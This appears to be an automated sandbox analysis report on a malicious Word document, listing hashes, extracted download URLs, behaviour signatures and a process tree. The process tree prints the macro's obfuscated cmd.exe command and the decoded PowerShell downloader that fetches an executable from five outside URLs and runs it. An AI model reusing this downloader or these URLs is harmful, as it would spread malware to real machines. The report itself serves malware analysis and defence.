Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
25/09/2024, 10:42
General
-
Target
f5d3ca8c627a7f1c30aecfa3553bfb88_JaffaCakes118.doc
-
Size
136KB
-
MD5
f5d3ca8c627a7f1c30aecfa3553bfb88
-
SHA1
5f2b8c81e9ab7258814a6c6bebbdf78eb4817112
-
SHA256
7dd66e46230910c82ace05f4202de37348aa956232ebb54dd7f75329f513af9f
-
SHA512
827c4559d4575ec7b2039077fc83de8f63bc2f59b390024be44274adb0e85cc05f3b663670ffc19f4310f145a36d7be1177c3116f2b92702b85b730bf77394d5
-
SSDEEP
1536:3J81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvad4+acN99QnzuWqmOid+:58GhDS0o9zTGOZD6EbzCdxQzuCOiY
Malware Config
Extracted
http://hellodocumentary.com/hellosouthamerica.com/j9skVzl
http://blackmarketantiques.com/J17M
http://bureauoranje.nl/yKOo
http://campus-web.com/nzi
http://bendafamily.com/HL9hiD8
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f5d3ca8c627a7f1c30aecfa3553bfb88_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /V:/C"set 3IY0=;'XRf'=ppt$}}{hctac};kaerb;'pqi'=uOY$;BAD$ metI-ekovnI;'jVV'=bkH$;)BAD$ ,mCO$(eliFdaolnwoD.NRq${yrt{)DUj$ ni mCO$(hcaerof;'exe.'+hwu$+'\'+pmet:vne$=BAD$;'wSI'=KTA$;'002' = hwu$;'qjM'=hZl$;)'@'(tilpS.'8Dih9LH/moc.ylimafadneb//:ptth@izn/moc.bew-supmac//:ptth@oOKy/ln.ejnarouaerub//:ptth@M71J/moc.seuqitnatekramkcalb//:ptth@lzVks9j/moc.aciremahtuosolleh/moc.yratnemucodolleh//:ptth'=DUj$;tneilCbeW.teN tcejbo-wen=NRq$;'aqM'=AvY$ llehsrewop&&for /L %q in (435;-1;0)do set 5Ls=!5Ls!!3IY0:~%q,1!&&if %q==0 powershell "!5Ls:~-436!" "2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "powershell $YvA='Mqa';$qRN=new-object Net.WebClient;$jUD='http://hellodocumentary.com/hellosouthamerica.com/j9skVzl@http://blackmarketantiques.com/J17M@http://bureauoranje.nl/yKOo@http://campus-web.com/nzi@http://bendafamily.com/HL9hiD8'.Split('@');$lZh='Mjq';$uwh = '200';$ATK='ISw';$DAB=$env:temp+'\'+$uwh+'.exe';foreach($OCm in $jUD){try{$qRN.DownloadFile($OCm, $DAB);$Hkb='VVj';Invoke-Item $DAB;$YOu='iqp';break;}catch{}}$tpp='fRX';"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Mqa4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5c7317f730df415c0fe8dadd5f0a17a96
SHA16e1a759dd3eb8221c0c4a5132401bf43a333016c
SHA2565e159853484f8cdcbf6cfb2892ad0f05f3fb1fbbedfde339a2595cdd731d3f36
SHA5127bd625192149fa81b80bd221ec0db4f9489bc4d255db4dc33a899f76cc073abdb55e2de4b387ecc870fd251bc15d3e3b19b29bddf924635ee4c2e3f40a1b28d9
-
Filesize
7KB
MD56eec97f260c9823dc1e08aa54a8e4791
SHA191efb1a305b33f73a9514e4bd06eb61ca77c9ccc
SHA25608985ccb49ae993cab285c563b27dc1f1e2e2c1f3b2a6a06d20ce36d77f5d715
SHA512b2a630f2859b1b58dbbd746784ef270b4ea73e73a08534977de7d6d1cc41c5319e5cb7359f480ee0b0c91001346d0842a0fdd9d7c13d49df35ca9ee5bfea4cd9
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
1024KB